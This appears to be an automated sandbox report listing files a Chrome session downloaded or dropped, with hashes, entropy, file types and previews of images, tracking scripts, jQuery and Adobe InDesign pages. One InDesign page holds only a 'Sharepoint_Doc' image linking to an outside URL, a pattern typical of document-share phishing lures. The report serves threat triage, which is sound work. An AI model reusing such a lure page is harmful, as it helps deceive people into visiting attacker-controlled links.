                                                                                                                                                                                                        SHA-256:BD6100B16A7F0EBDE9434098FF7BD0287BD4F93B2C6154A73953B5DEB865E74F
                                                                                                                                                                                                        SHA-512:7C1E4FBB46E1C14AAFB87B81A6362189D13F407EC52809DFA1DE4E5AEE018ECFD68677523EC78A36A1CBC38B259AA5C67C26436B9EC36568185161232ECDE6C1
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://reviews.capterra.com/_next/static/chunks/webpack-b2dc317f7f6b4c6b.js
                                                                                                                                                                                                        Preview:!function(){"use strict";var e,t,n,r,c,f,a,d,o,i,u={},b={};function s(e){var t=b[e];if(void 0!==t)return t.exports;var n=b[e]={id:e,loaded:!1,exports:{}},r=!0;try{u[e].call(n.exports,n,n.exports,s),r=!1}finally{r&&delete b[e]}return n.loaded=!0,n.exports}s.m=u,e=[],s.O=function(t,n,r,c){if(n){c=c||0;for(var f=e.length;f>0&&e[f-1][2]>c;f--)e[f]=e[f-1];e[f]=[n,r,c];return}for(var a=1/0,f=0;f<e.length;f++){for(var n=e[f][0],r=e[f][1],c=e[f][2],d=!0,o=0;o<n.length;o++)a>=c&&Object.keys(s.O).every(function(e){return s.O[e](n[o])})?n.splice(o--,1):(d=!1,c<a&&(a=c));if(d){e.splice(f--,1);var i=r();void 0!==i&&(t=i)}}return t},s.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return s.d(t,{a:t}),t},s.d=function(e,t){for(var n in t)s.o(t,n)&&!s.o(e,n)&&Object.defineProperty(e,n,{enumerable:!0,get:t[n]})},s.f={},s.e=function(e){return Promise.all(Object.keys(s.f).reduce(function(t,n){return s.f[n](e,t),t},[]))},s.u=function(e){return 6310===e?"static/chunks/
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:PNG image data, 120 x 120, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):5074
                                                                                                                                                                                                        Entropy (8bit):7.95240940216256
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:EiAe3U9w6Et0VI9Tg5wjoSWOUMplip7rYdkd0a5PX3j0odTnWRLe76:Hz+VI9WwjoSWnBp7cUX3j14Le76
                                                                                                                                                                                                        MD5:A573DE4386DFC6DDE0606507CBED0BA4
                                                                                                                                                                                                        SHA1:203269219F0040BD458D92608DCC050F531A4A8A
                                                                                                                                                                                                        SHA-256:D4AF1F6A5C4B71439886D7603E272F9DF0524E6A8BEEA336C6FF0E98CCA19011
                                                                                                                                                                                                        SHA-512:84D16AC6F546FD8FA0A9327F4FA2B01C29695C75103955942F6E3547FBAAB3D7A2C4483CEE9A154CF10E0A77E27A235E5E438EF3E981D75277BBF94CFE66C0E9
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:.PNG........IHDR...x...x.....9d6.....sRGB.........IDATx^...T..._..=.0....y) ......h.9.&.8.F4'.uC.u.Y.=.OXE7..F\crN.n.f\p..P1..".(.!......}...Uw...=.s....s......._.W_}UE.^.Uj7...".|....!.......}.I&...@.....Y....>pJK..jjB.tb.>[.kL.d.QMP.k..H).kZ.y.o)...@....)..!.....P...I!P..^a.1...!..BX......QT.H.B....-............l...U....T...[T..A..^L.f....-..{..U..7m...".|....~...PMu.......AO..&..V...G.H.Z..*.o...5Y\....+4.g@...nQy......|......,_....z..{A...PI.@S#.{.7.|~....._@.*z.!..A...k............q..M.*..[....z...lm...\Ps...=.!.p.A.u.Yi......X*{...CU@.\03...t.D[5..k.o@iv.}oQ....\.t.[].v[.....r.2A."....$Y...m..,Oi.&.5...*`q.XZ..g..:.p......k.* )....4`..'.....+&qQ.i...z...v.TTaJX.05.W....FC.,F.z.H..6..5^.i...+..A......S. djV...#!%........U...G......z..)..+...I:.m.C!.V.t.K..|=~....&{7.C.)...G....f..(X.....V2).g.f.n...$\RB...0.\`P/B..B.M(.8.C.F..4;..Z4v7j|V...^ca..g2W..eA.9....T...6W.1*F..R....F.*.\.,B.]..|.4.5.6*l9..|....z.......e......tA..'..S.....0n.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:PNG image data, 120 x 120, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):8352
                                                                                                                                                                                                        Entropy (8bit):7.971122939784543
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:owoxllUsKJb3/dbaxto8wdDzvwKRmzyc/cTbv84ijfH9xv2qf0y:owVrdbQhwdDzjmzyc/eij/9xeqf0y
                                                                                                                                                                                                        MD5:7051B97AC9DEF826BF6473C38B7D14E2
                                                                                                                                                                                                        SHA1:E96A86ADC3DE0C345E482730D1A4DC458B4A650A
                                                                                                                                                                                                        SHA-256:8477D02CFA3435F5C3A51DF9088DC5D7D7D7B3093D2373D5393CE49B5E9E81FB
                                                                                                                                                                                                        SHA-512:196D60DFE7EE17C7DE2BDF62B2296019B99B5B1D615E2379E20BEC48D1BB2F51E92A107BDCF1D95FF7BC290846AE39A7FB87253242E33D7F6DFD74C433DC828E
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:.PNG........IHDR...x...x.............sRGB....... .IDATx^.].xSU.>.....+mi....a)...a.E..GD...A..qf.F...(*.(.....#...BYZ..t/..........&...<y.<...{.9.....!.....@..G..Ot7.Ot7.Ot7...(p.....`...h....."`.{....IpQ.+...G4.T~[.Y.h.......B..P...<..~.;.h..No....I./.":.]a`;.....[D.t...:...m.;.U.W..,wG..g.;Bp.a.;.{#./.]N....'.Oq......{2...(.=.."....2.. .-....c..;6..Wo..@....\NH.'4.q8...H......J%..1#........D.(.<.{`..&........t.........rRR.......&%....#.B....e.(....(<.JO..8P<z....nDD..}&.k.A...f.]..*%.t.0..c+(.ee.7oV...93......4a...4..[c..vkf...A-..q.....4....x..ZP.]!.M..R.?_>f.LN...7Z..X......a!K.H'M.J.,#...-[....Ftc`....s.....C.C\.O....e..E..o.....Xf.....P"A))v.L>gN../h.\.md.|l...(%.VPP9iR....4..4>..,.P.8Q.o.[. ...........%..q.....S.......1s&..7%.apA..}..FF..N.H...5..j...]..W*.R....;.....T....g\.!...~.q..z.....h).6....].~.-i8)..HD..J.s.Xjjb_x.r8.V...c.^J h..hh..n.2fe..l.. .....S.....|s.....(..h......l......)S"f...{..6.`lU*....#G...v;...I.E...._...
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):2479
                                                                                                                                                                                                        Entropy (8bit):6.947867643931722
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:2X11LVknA9WpIIFpPu/cb3YHq31HUDj++58vcyPOny71pyfgeRSJmNx8j5FLw:2lvknmWpIc9u/pHCHUZ51yPOnU3uRSi/
                                                                                                                                                                                                        MD5:C192789878FB646B5346608C0E48365E
                                                                                                                                                                                                        SHA1:CE4ACD0C277EB646C78040E24E3B347C239F40A7
                                                                                                                                                                                                        SHA-256:A6B2128DF63E524A8619247ABB987A7FF37FF188F94507A2BED134A9ECA82D0F
                                                                                                                                                                                                        SHA-512:57739297AD83AD1554070A274BB628A1346515DCFD2EC81D922C9071EE4DE87ABE1963652C4E52360B6051F79CD20F9F8A81462D3A23F89C53512B057D25A408
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://publicate.it/images/favicon.png
                                                                                                                                                                                                        Preview:.PNG........IHDR... ... .....szz.....pHYs...#...#.x.?v....iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c148 79.164036, 2019/08/13-01:06:57 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmp:CreatorTool="Adobe Photoshop 21.0 (Macintosh)" xmp:CreateDate="2019-11-06T09:47:03Z" xmp:MetadataDate="2019-11-06T09:47:03Z" xmp:ModifyDate="2019-11-06T09:47:03Z" xmpMM:InstanceID="xmp.iid:31036cdc-9cd5-4966-ad80-b38f1c81eec8" xmpMM:DocumentID="adobe:docid:photoshop:df063a2f-a4df-954e-96f4-cb456322f58e" xmpMM:OriginalDocumentID="xmp.did:f0f31cf4-23ac-4375-a1ff-585940563130" dc:format="image/png" photos
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ISO Media, AVIF Image
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):4364
                                                                                                                                                                                                        Entropy (8bit):7.191909145720803
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:+zYjwzcjFflsXlf/lulel4wlwx+6MjnNsvIYWiR5QkyTJbZPHXZ9u6gbVwyKzJg7:+0jsc5N26MT0D5MdtbZPAVwzVHlOA8P
                                                                                                                                                                                                        MD5:14D947FEC241029FC52376974DE942CD
                                                                                                                                                                                                        SHA1:E0E884E30EA521930EC8865D964FA7F8A408147E
                                                                                                                                                                                                        SHA-256:9FC9325939FBD61EBCF1480BD8529DB1EB04A1BC33FD6554768F80124B1D0D52
                                                                                                                                                                                                        SHA-512:3401B9D2E7560560D526FC17932E9B666C24562076EBB7D21EC958E9CD633ED6AD339BEDD0CF62AF93FDF4602C40A86AF05ADC36F115D47131913C3F7546D472
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://gdm-catalog-fmapi-prod.imgix.net/ProductLogo/e1b492c5-8a97-4b86-a422-d317b2480afa.png?w=60&h=60&dpr=2&auto=format
                                                                                                                                                                                                        Preview:... ftypavif....avifmif1miafMA1B...Gmeta.......(hdlr........pict............libavif.....pitm..........iloc....D............o.......(iinf..........infe........av01Color.....iprp....ipco....ispe.......x...x....pixi............av1C.......Tcolrprof...HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour spa
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):12820
                                                                                                                                                                                                        Entropy (8bit):4.678414118091167
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:G/Vg8qpJm/fVfCdSlexCRDokFPbK9JEmLuzwu:sV6rw1eSAUnFPyEmLi
                                                                                                                                                                                                        MD5:9A60A3960C550A8AC843BAA9B4254968
                                                                                                                                                                                                        SHA1:CB845D7F5D667922F61FCB0BA722D1A0FCDD6A4D
                                                                                                                                                                                                        SHA-256:79F520F3694EC8DBDBA29E839DA7E145701119302EEB6BF8D5DE5F2015B6BEC2
                                                                                                                                                                                                        SHA-512:80211EA3546151E5B1EA83C19D48A03D01644195FDD3E16055F379523D251D1A9DC615D7DDDF77242F6BE14B875836CC9044BA6494DAF2584330685CFAF7D6AD
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="UTF-8"?>.<svg width="136px" height="136px" viewBox="0 0 136 136" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">. <title>1</title>. <defs>. <path d="M8.97826087,0 L109.021739,0 C113.980296,0 118,4.01970431 118,8.97826087 L118,109.021739 C118,113.980296 113.980296,118 109.021739,118 L8.97826087,118 C4.01970431,118 0,113.980296 0,109.021739 L0,8.97826087 C0,4.01970431 4.01970431,0 8.97826087,0 Z" id="path-1"></path>. <filter x="-12.3%" y="-8.9%" width="124.6%" height="124.6%" filterUnits="objectBoundingBox" id="filter-2">. <feMorphology radius="0.5" operator="dilate" in="SourceAlpha" result="shadowSpreadOuter1"></feMorphology>. <feOffset dx="0" dy="4" in="shadowSpreadOuter1" result="shadowOffsetOuter1"></feOffset>. <feGaussianBlur stdDeviation="4" in="shadowOffsetOuter1" result="shadowBlurOuter1"></feGaussianBlur>. <feComposite in="shadowBlurOuter1" i
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:PNG image data, 120 x 120, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):3676
                                                                                                                                                                                                        Entropy (8bit):7.91631431460859
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:AUUInWIu0CT/5jcnIdPvrOYBQrNjBwfZg:g+WI2TB4ncTBoYK
                                                                                                                                                                                                        MD5:A53529CCE6920D137AFFD83A3F852124
                                                                                                                                                                                                        SHA1:8397D2BA4754F3B5FA3BBD02ACBB783BEFF69BFE
                                                                                                                                                                                                        SHA-256:FB2FCF7E669D0FA8C27D779F5516837A36780F04E96D78C5A3665E4584813EBC
                                                                                                                                                                                                        SHA-512:F3ABFE6F3C9C05C28276A8EBB2489A6888BA8CD53B4FC182EDCD7B0F2B63112866E99D940BE3C4091BF74279EF1D548589DB2CE8E9309DEA4FECD1E0E6E23505
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:.PNG........IHDR...x...x.....9d6.....sRGB.........IDATx^.}pUg....97/.K.BiIB..0.............[.:k../..?..m....8.ug...U..h.....el....iiCyI.....".M.y~;.7.0P$..{...L.$....y.......;@LLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLL.!&..56:U.}...'...[......8%%...S.Q>...r#Ej.x-..".D"!.B... ........C..z|....GQ"...r...........&.\.H..I....T.KF^g...7@.,`.......f.7.F.R...L%..h".B.....B..YA.sA......c/..4.~Q.V>..".h...F.......^.>......x.}....{..j#........S(."/.....]......$...k...cc}..|.nc.{Nf......3.0...gU.{......eF.E.-...i..j.[.@D...=.y.T].=...I.GE.Z..db........ bDN....D....vT.Mi..Q...!#....u-"D...]].OJ.o...j...m[....W..m......`*Y.....B...l..S...W....1..>.JN...&...@C..X.E^TP.Y.-.b...z..x....".9.0.>...N....&p..O....Xr.;...+.k7...D...s..R..lD^.1.....<.P.... ......|.....'...>.....g'..#.s.]..<.R...M...xZ.WL.y.k.........>..EW...?B.. ..J..K.ca....e&.q..=.4.k.. O.!..p...m.#......G.....rD.'m>..L.p.....'.F+:V.0o>...q.h.....7ovQ.-.wU.B*<.H..i..P.S.'.2O......y..w..K'..9
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:HTML document, ASCII text
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):562
                                                                                                                                                                                                        Entropy (8bit):5.228759578793965
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:12:hYegkTFj+/7aHkFqvyA9920EuNbF6ec3hQ0QL:hYelTN+/7cvj92huuhhQv
                                                                                                                                                                                                        MD5:A94F487BF2FD655DBEB247E7CC2A580F
                                                                                                                                                                                                        SHA1:3938E0A8F177054A7455A1DD713871E206B415F4
                                                                                                                                                                                                        SHA-256:F55E1D2D7157B3CD86110221D04797D840A9F36202BC3AD2B2C8B48257720C89
                                                                                                                                                                                                        SHA-512:0A7E0CF46EEC57A03962878A072680DD0CE4E453E7FA7775376316B9B72031899525DA85C9E1B639F070413959E7CE05539A88E88FB0DD6A8F1D0DD7AEEA5D69
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://indd.adobe.com/content/2/30080812-36e9-4257-a76c-64b9db55c4c1/1725012499262/package/1/publication.html
                                                                                                                                                                                                        Preview:<!DOCTYPE html>.<html xmlns="http://www.w3.org/1999/xhtml">..<head>...<meta charset="utf-8" />...<title>publication</title>...<link href="publication-web-resources/css/idGeneratedStyles.css" rel="stylesheet" type="text/css" />..</head>..<body id="publication" style="width:612px;height:792px;background-color:white;">...<a href="https://pblc.me/pub/40f029dddc28e3">....<div id="_idContainer000">.....<img class="_idGenObjectAttribute-1 _idGenObjectAttribute-2" src="publication-web-resources/image/Sharepoint_Doc.png" alt="" />....</div>...</a>..</body>.</html>.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ISO Media, AVIF Image
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):3156
                                                                                                                                                                                                        Entropy (8bit):7.728817048998753
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:+zCj2ebz4ApBrixjqTZedp7Y5dWcm/DTqY0MEn:+zCiebUMcqWSWt3uMC
                                                                                                                                                                                                        MD5:0AE69AA9A52CB21C38ABC4C2ADD0A791
                                                                                                                                                                                                        SHA1:76D0146ED972F2B023914C00AF1A2FCB7A56F89C
                                                                                                                                                                                                        SHA-256:6C077D41A51022AED242D4B90C1893FDE18A1D3C04C933E85E289DBAFA419AAA
                                                                                                                                                                                                        SHA-512:63D4A60CDBFBB66997A8E0155BBC5354AF25D85606541900A7B44388DF5BA5A73FC3765C428C9761C390487AA51873388FDD157D86AF3455F5BA28725D602852
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://gdm-catalog-fmapi-prod.imgix.net/ProductLogo/1a2b2816-ff47-405e-a9e2-2b8d6fd68dfd.png?auto=format%2Ccompress&fit=max&w=128&q=75&ch=Width%2CDPR
                                                                                                                                                                                                        Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm.........,iloc....D..................................Biinf..........infe........av01Color.....infe........av01Alpha.....iref........auxl..........iprp....ipco....ispe................pixi............av1C........colrnclx...........pixi..........av1C.......8auxC....urn:mpeg:mpegB:cicp:systems:auxiliary:alpha.....ipma..........................mdat........aP2......P.W}..*%..Z.....x.G..".5r8i.O.X-8p.5..RHp2.X..v..^..>.....g.j".RTA_..~2.)..h..?....le.w..p....e=....0.<..."{.$...v...J..t.._.....L.....p.M-.(.@.O.....y(.y7a.6^#Y...>.h.s.O.T.}z.......!z..D...+-....X.0....y...'.(...W.........b...d.|%.>..U...1[4..M$.F...}=T!..`.:...Us\g3'.'.F..+.a4..wK,3G.8...ok......l.>.>.C...x..2f..;R.{....-.[....T...I...Z.=l.#5"[..1A ...A.m0D......x......[.......J.J8.l.1R.<{......4#b..Nsdo.B{)...2.h...4...m.;...M...j.HA.[c.y?..C..k/...GHb.|z..9..\/.v\.a.~6.>...?...N.r...4"..d../r..H.^.Ac..R.A...
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (2345)
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):236306
                                                                                                                                                                                                        Entropy (8bit):5.528027499431277
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6144:BSAdB6siAoEG6D4j4cMz4aHlEZtNAJ0bb:gAv6sHoMVHWbb
                                                                                                                                                                                                        MD5:CB89AAC9A17E684A2416D8DB03AF797B
                                                                                                                                                                                                        SHA1:D9001533C1DF5296FE09C62BC6A4F475148E2F48
                                                                                                                                                                                                        SHA-256:FB4E515CCAEF645DE2541D9EAEC5DD1A503DE5420B566FEE248F159AF4A64841
                                                                                                                                                                                                        SHA-512:94A1BA550FEEFECEE1CCB40C3D86A1C7150F84CAD45987F067922F24416265A49FC597FE09B902EF1BB5C23DCE1A63F0F25CAF041C0219E0631B53163651FE00
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://www.googletagmanager.com/gtag/destination?id=AW-1072635088&l=dataLayer&cx=c
                                                                                                                                                                                                        Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"1",. . "macros":[{"function":"__e"},{"function":"__cid"}],. "tags":[{"function":"__rep","once_per_event":true,"vtp_containerId":["macro",1],"tag_id":1}],. "predicates":[{"function":"_eq","arg0":["macro",0],"arg1":"gtm.js"}],. "rules":[[["if",0],["add",0]]].},."runtime":[ [50,"__cid",[46,"a"],[36,[17,[13,[41,"$0"],[3,"$0",["require","getContainerVersion"]],["$0"]],"containerId"]]]. ,[50,"__e",[46,"a"],[36,[13,[41,"$0"],[3,"$0",["require","internal.getEventData"]],["$0","event"]]]]. .].,"entities":{."__cid":{"2":true,"4":true,"3":true}.,."__e":{"2":true,"4":true}...}.,"blob":{"1":"1"}.,"permissions":{."__cid":{"read_container_data":{}}.,."__e":{"read_event_data":{"eventDataAccess":"specific","keyPatterns":["event"]}}...}....,"security_groups":{."google":[."__cid".,."__e"..]...}....};.....var ba,ca=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):4218
                                                                                                                                                                                                        Entropy (8bit):4.544439217564774
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:UqQIf1nMokw38pyoiscC/EDxep5ibaMSXnT:1Qy1nMFw38MoiIMDYMaMu
                                                                                                                                                                                                        MD5:EF6A09165D42F65868127041B2878D5A
                                                                                                                                                                                                        SHA1:224A834D1E376E3047BA1AD17C2488FA532A5F7D
                                                                                                                                                                                                        SHA-256:644BE328F7BF3C9ABD9421EB3615110FBC9C660542F8E061D00BDF6C4E58A624
                                                                                                                                                                                                        SHA-512:7BE3A953E1C7894FFB0616ACEFFCD1DC1552F665B370713317AB965F0314B1F4B23F0E776B2F93D57127A5E508A3E57DBD5E6BD88FB6F0B766DC3D51D0EFA9C8
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://publicate.it/images/adobe.svg
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. Generator: Adobe Illustrator 14.0.0, SVG Export Plug-In . SVG Version: 6.00 Build 43363) -->..<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">..<svg version="1.1" id="Ebene_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px"... width="183.122px" height="48.105px" viewBox="0 0 183.122 48.105" enable-background="new 0 0 183.122 48.105"... xml:space="preserve">..<polygon fill="#FFFFFF" points="3.701,4.24 49.274,4.24 49.274,44.571 3.701,44.571 "/>..<path fill="#E20025" d="M32.428,4.24l16.846,40.331V4.24H32.428z M3.701,4.24v40.331L20.56,4.24H3.701z M19.128,36.459h7.855...l3.21,8.112h7.034L26.495,19.103L19.128,36.459z"/>..<path d="M73.332,4.134l-9.12,40.438h5.52l2.4-11.159h8.4l2.34,11.159h5.58l-8.58-40.438H73.332z M72.792,28.912l1.92-9.659...c0.54-2.58,1.14-6.3,1.56-9.239h0.24c0.42,2.88,0.96,6.479,1.5,9.239l1.86,9.659H72.792z M109.521,3.054h-5.64v15.179
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:HTML document, ASCII text, with very long lines (32086)
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):167931
                                                                                                                                                                                                        Entropy (8bit):5.38581826717555
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3072:vNMyqhJvN32cBC7M6Whca98HrAjwggKYDdRgongAqFFHcw:vq17hbvca98HrkgKYDdRgogAqFRT
                                                                                                                                                                                                        MD5:201782983FC4FA6864EAD91A08071690
                                                                                                                                                                                                        SHA1:1007CA736CD67D5CBF27D3AE82156FFC3A6AC0A0
                                                                                                                                                                                                        SHA-256:0CF517631FB0C24CE50B2BCB153C48FC0A7F4033929F63FE32FDD22AC26AE2F3
                                                                                                                                                                                                        SHA-512:FAF601058A605066C34A601600F461612EE0855FDD7EE122427039810420255905CE1024D353ABE4645EFE6071E58217FC9A35FA83E87FF42AABEF48958531D1
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:"https://indd.adobe.com/1_c19ab23/public/build/contentHandler/contentHandler.html?basepath=https://indd.adobe.com&relativepath=/content/2/30080812-36e9-4257-a76c-64b9db55c4c1/1725012499262/package/1/publication.html&parentorigin=https://indd.adobe.com&maxPageDimensions={%22width%22:612,%22height%22:792}&transition=false"
                                                                                                                                                                                                        Preview:<!DOCTYPE html><html><head><meta http-equiv="X-UA-Compatible" content="IE=EDGE"><meta charset="utf-8"><link rel="stylesheet" type="text/css" href="contentHandler.min.css"><script>/*! jQuery v1.11.1 | (c) 2005, 2014 jQuery Foundation, Inc. | jquery.org/license */.!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=c.slice,e=c.concat,f=c.push,g=c.indexOf,h={},i=h.toString,j=h.hasOwnProperty,k={},l="1.11.1",m=function(a,b){return new m.fn.init(a,b)},n=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,o=/^-ms-/,p=/-([\da-z])/gi,q=function(a,b){return b.toUpperCase()};m.fn=m.prototype={jquery:l,constructor:m,selector:"",length:0,toArray:function(){return d.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:d.call(this)},pushStack:function(a){var b=m.merge(this
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):43
                                                                                                                                                                                                        Entropy (8bit):3.0314906788435274
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:CUkwltxlHh/:P/
                                                                                                                                                                                                        MD5:325472601571F31E1BF00674C368D335
                                                                                                                                                                                                        SHA1:2DAEAA8B5F19F0BC209D976C02BD6ACB51B00B0A
                                                                                                                                                                                                        SHA-256:B1442E85B03BDCAF66DC58C7ABB98745DD2687D86350BE9A298A1D9382AC849B
                                                                                                                                                                                                        SHA-512:717EA0FF7F3F624C268ECCB244E24EC1305AB21557ABB3D6F1A7E183FF68A2D28F13D1D2AF926C9EF6D1FB16DD8CBE34CD98CACF79091DDDC7874DCEE21ECFDC
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
